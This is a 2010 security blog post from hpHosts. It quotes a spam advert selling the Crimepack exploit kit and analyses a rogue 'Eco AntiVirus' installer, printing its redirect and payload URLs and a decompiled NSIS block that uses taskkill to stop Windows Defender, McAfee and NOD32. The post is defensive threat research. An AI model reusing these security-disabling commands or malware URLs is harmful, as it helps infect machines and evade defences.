Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 28 February 2010

Crimepack for sale: I wanna be a storm trooper! ....

... but I'll settle for having a laugh at a spam that's just came in. Laughing you ask? Well yes - for starters there's no plain text content, no subject and no HTML content.

It would seem these silly spammers have decided it best to include the content in the actual headers (likely a bug in their auto-mailer);

Return-Path: root@server.bestindiansexvideos.com
Delivered-To: r00t-y0u_org@it-mate.co.uk
X-FDA: 63288034572.03
X-Panda: scanned!
X-Filterd-Recvd-Size: 3729
Received: from server.bestindiansexvideos.com (unknown [205.234.223.183])
by imf25.hostedemail.com (Postfix) with ESMTP
for ; Sun, 28 Feb 2010 18:44:45 +0000 (UTC)
Received: from root by server.bestindiansexvideos.com with local (Exim 4.69)
(envelope-from )
id 1Nlo89-00035f-E4
for r00t-y0u_org@it-mate.co.uk; Sun, 28 Feb 2010 13:44:41 -0500
To: r00t-y0u_org@it-mate.co.uk
From :CRIMEPACK
Subject: CRiMEPACK EXPLOIT SYSTEM

We are here to introduce to the newest exploit system on the market and a whole new concept for the people:

"highest rates for the lowest price"

We do not focus on having a fancy ajax layout and shitty rates combined with outrageous prices like other packs, we focus on the outcome.

All exploits used are modded to perfection to get the highest rates out of it possible.
And instead of throwing together as many exploits as possible (like other packs out there)
We decided to handpick a few with higher effectiveness

That Includes:

Globals

+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ AGGRESSIVE MODE**
Internet Explorer

+ MDAC
+ DSHOW
+ MS09-002

** This is a feature that can be turned on/off from the settings panel
It's a Java applet that will popup asking the user to run the applet, If he approves, exe will load.

Exploit rates on test run (26/2/2010)

Internet Explorer 6 & 7 - 39%
Firefox - 14%
Opera - 6%
Overall Rate: 30%

Rate Countries:

US: 14%
UK: 7%
IN: 38%
DE: 16%
TR: 22%
IT: 18%
AU: 11%

Note that these stats are taken from the test run
The results may increase or decrease depending on quality of traffic

------------------------------------------------------------------------------------------

Features:

1. Undetected from AV Scanners (Javascript & PDF/JAR/JPG files)
2. Random PDF Obfuscation (Not using static pdf file like other packs)
3. Blacklist checker & AutoChecker
4. Prevent Wepawet, Jsunpack and other javascript unpackers to decode your page

Will autocheck (can be turned off) your domain for blacklist & malware lists, and will notify you if found, Checks the following:

+ Norton SafeWeb
+ My WebOfTrust
+ Malc0de
+ Google Safe Browsing
+ Malwaredomainlist
+ Mcafee SiteAdvisor
+ hpHosts
+ Malwareurl



------------------------------------------------------------------------------------------

Current version 2.2.1 prices:

$400 - 1 License

1 License includes:

+ Domain locked one domain (subdomains unlimited)

+ 2 new domain builds if blacklisted

+ Support

+ Minor updates for free

+ Discount on new releases


Extras:

1. Domain re-build for other domain (50$)

*** NOTE: YOU ARE NOT ALLOWED TO RESELL/SHARE, IF WE CATCH YOU DOING THIS YOUR LICENSE WILL BE REVOKED ***

2. AV-Cleaning ($80 first time, $50 after)

If you are interested in promoting/reselling, you will get a good offer

------------------------------------------------------------------------------------------

Contacts:

MSN: crimepack@googlemail.com
ICQ: 631592697

WE ACCEPT PAYMENTS THROUGH WEBMONEY AND LIBERTYRESERVE
Message-Id:
Date: Sun, 28 Feb 2010 13:44:41 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.bestindiansexvideos.com
X-AntiAbuse: Original Domain - it-mate.co.uk
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - server.bestindiansexvideos.com


As you'll notice from the headers, the e-mail originated from 205.234.223.183 (205.234.128.0/17 - AS23352 SERVERCENTRAL Server Central Network), which is home to;

bestindiansexvideos.com
buycheapmobilecontractphones.com
cheapholidaysflightshotels.co.uk
chinanewsx.com
clothesshop4u.co.uk
contractphoneslive.com
freepornza.com
gmobilephones.co.uk
holika.com
mobilephonedealshub.com
taxizza.com
uknewsx.com
watchindiansexvideos.com
wearelondoners.co.uk


Best I can tell, every single one looks like someones poor attempt at SEO.



But wait, there's also an advert there for eco-antivirus-2010.com. Wonder what happens if I click that "advert"? Well, the URLs we're taken through are;

http://www.holika.com/c/adclick.php?ad=YWR2ZXJ0aXNlcl9pZD0xMDM2JmNhbXBhaWduX2lkPTQyJnB1Ymxpc2hlcl9pZD0xMDAyJmNsaWNrX2NwYz0wLjEwJnJhbms9MSZ6b25lPTEmdXNlcl9pcD04Mi4zOS4xMjMuNTYmb2Zmc2V0PTIyJmNsaWNrX2lkPTY0OGFhZDBjZjQ3MjM5OWFkYTdhODJjMjk2MzI1ODcxJmtleXdvcmQ9Jm1hdGNoZWRfa2V5d29yZD0mYWRfY291bnQ9MyZwYWdlX3JlZmVycmVkPWh0dHAlM0ElMkYlMkZ3d3cud2F0Y2hpbmRpYW5zZXh2aWRlb3MuY29tJTJGJnVybD1odHRwJTNBJTJGJTJGcHJvcHJhdG9yMTQuaW5mbyUyRjA4N3dMeVF6TDFFekwlM0QlM0QmZGF0ZXN0YW1wPTIwMTAtMDItMjggMTQ6MDI6MzkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZjeHVfaWQ9OTM3NTkmY3h1a19pZD0w;eaddeca30bdba43e2ee3c8b04bcc8a3e
http://www.holika.com/c/adclick.php?ad=YWR2ZXJ0aXNlcl9pZD0xMDM2JmNhbXBhaWduX2lkPTQyJnB1Ymxpc2hlcl9pZD0xMDAyJmNsaWNrX2NwYz0wLjEwJnJhbms9MSZ6b25lPTEmdXNlcl9pcD04Mi4zOS4xMjMuNTYmb2Zmc2V0PTIyJmNsaWNrX2lkPTY0OGFhZDBjZjQ3MjM5OWFkYTdhODJjMjk2MzI1ODcxJmtleXdvcmQ9Jm1hdGNoZWRfa2V5d29yZD0mYWRfY291bnQ9MyZwYWdlX3JlZmVycmVkPWh0dHAlM0ElMkYlMkZ3d3cud2F0Y2hpbmRpYW5zZXh2aWRlb3MuY29tJTJGJnVybD1odHRwJTNBJTJGJTJGcHJvcHJhdG9yMTQuaW5mbyUyRjA4N3dMeVF6TDFFekwlM0QlM0QmZGF0ZXN0YW1wPTIwMTAtMDItMjggMTQ6MDI6MzkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZjeHVfaWQ9OTM3NTkmY3h1a19pZD0w%3Beaddeca30bdba43e2ee3c8b04bcc8a3e&c_result=e4cd7e371cdf54da833ec0ec3cc0521c
http://proprator14.info/087wLyQzL1EzL==
http://scnadator14.info/25/27-087wLyQzL1EzL==


With the payload (Eco_Install.exe, MD5: 3de085a41b50d0c038aa29a5e9888bf2) coming from;

http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=1
http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=2


This malicious goodness is hosted surprise surprise, by AS32613
IWEB-AS iWeb Technologies Inc. http://www.iweb.com/ (174.142.0.0/16), on 174.142.96.0/24. You'll no doubt recognize some of the other domains listed.

VirusTotal shows 26 vendors detecting this particular variant;

http://www.virustotal.com/analisis/10ab76e229200dd6ce179d9533b07d92be7bd02189e826d57d31315c1321be31-1267388160

The file is packed with 7zip, and unpacking it shows several dll files, one batch file (DD.bat), and of course, the nsis.nsi file.

Eco_Install.exe/
Eco_Install.exe/[NSIS].nsi
Eco_Install.exe/$COMMONSTARTMENU
Eco_Install.exe/$COMMONSTARTMENU/Programs
Eco_Install.exe/$COMMONSTARTMENU/Programs/ Eco AntiVirus
Eco_Install.exe/$EXEDIR
Eco_Install.exe/$EXEDIR/DD.bat
Eco_Install.exe/$EXEDIR/$PLUGINSDIR
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/nsExec.dll
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/NSISdl.dll
Eco_Install.exe/$PLUGINSDIR
Eco_Install.exe/$PLUGINSDIR/someth.dll
Eco_Install.exe/$PLUGINSDIR/UAC.dll


Looking at the NSIS file showed some rather interesting strings, such as;

StrCpy $1 "t414q"
StrCpy $[36] "v.net"
StrCpy $[35] "http://ahah3h884.eco-a"
StrCpy $[34] "http://ahah3h884.eco-a"


If we load ahah3h884.eco-av.net (also hosted at 174.142.96.2), we're automagically 302'd to macacafe.com (69.64.155.126, AS21740 DemandMedia AS DemandMedia);

HTTP/1.0 302 Found
Expires: 0
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
X-Powered-By: PHP/5.2.6-1+lenny3
Location: http://macacafe.com
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sun, 28 Feb 2010 20:20:55 GMT
Server: lighttpd/1.4.23


Rather surprising given this domain isn't live - it's parked (though given this behaviour is seen when loading several other mysterious sub-domains associated with Eco AntiVirus/Green AntiVirus, it wouldn't surprise me if this was deliberate).

Looking further down the NSIS file, we also see it attempts to kill the task of varying security programs, including NOD32, Windows Defender and McAfee;

IfFileExists $SHELL[17]\Windows Defender\*.* 0 392
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\McAfee\*.* 0 398
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im mcregist.exe /im wmiprvse.exe /im mcsysmon.exe /im Mcshield.exe /im McNASvc.exe /im MpfSrv.exe /im McSACore.exe /im mcagent.exe /im msksrver.exe /im MpfSrv.exe /im mcmscsvc.exe /im McProxy.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Eset\*.* 0 404
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im nod32krn.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Windows Defender\*.* 0 411
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
Rename $SHELL[17]\Windows Defender\*.* $SHELL[17]\dm\*.* 0


I'm planning on running the installer later (assuming it'll run on my 2000 test machine (64MB Ram, so probably not)), as there's also references to additional files being downloaded, but due to the NSIS file containing a ton of "Invalid" lines, I'm suspecting either the installer I've got is corrupted, or I've missed a string somewhere (Anubis reports the same thing, as does CWSandbox, but the report shows the URL's returning a 404). I'll report back on that once I'm done.

Malwarebytes AntiMalware users will be pleased to know this is already detected as Rogue.EcoAntiVirus.

6 comments:

Pedro said...

good write-up, do you have any sample of a page hosting this Crimepack Exploit System?

MysteryFCM said...

Still trying to find it unfortunately :o(

M said...

i got it from http://www.latimes.com/news/nation-and-world/la-na-pelosi23-2010mar23,0,5391272.story
damn republicans!! no but really, nearly every link i visted was making my avg with build 271.1.1/2764 go crazy. i dont know if its the site or my computer. but i didnt get it on some of their webpages. but the ones that had it, i would refresh and everytime i would receive
Threat Detected!
filename
ad.doubleclick.net//news/nation-and-world/la-na-pelosi23-2010mar23,0,5391272.story
Exploit Crimepack Kit(type 766)

kvaughn said...

I am a novice computer user and I have experienced this Crimepack Exploit Pack.....it seems AVG is blocking me from accessing my home newspaper website because of some threat. I have accessed this site many times before. How do I get rid of this so that I can read my paper?!

MysteryFCM said...

I'm still looking into this but chances are, it's coming via a malvertisement.

Until this is confirmed, I'd actually suggest sticking with AVG's detection and staying away from the website.

For those technically able, if you use AVG and it flags a site as having this, could you grab a Fiddler log for me please, and drop me an e-mail.

MysteryFCM said...

Confirmed as an F/P

http://forums.avg.com/ww-en/avg-free-forum?sec=thread&act=show&id=75387#post_75387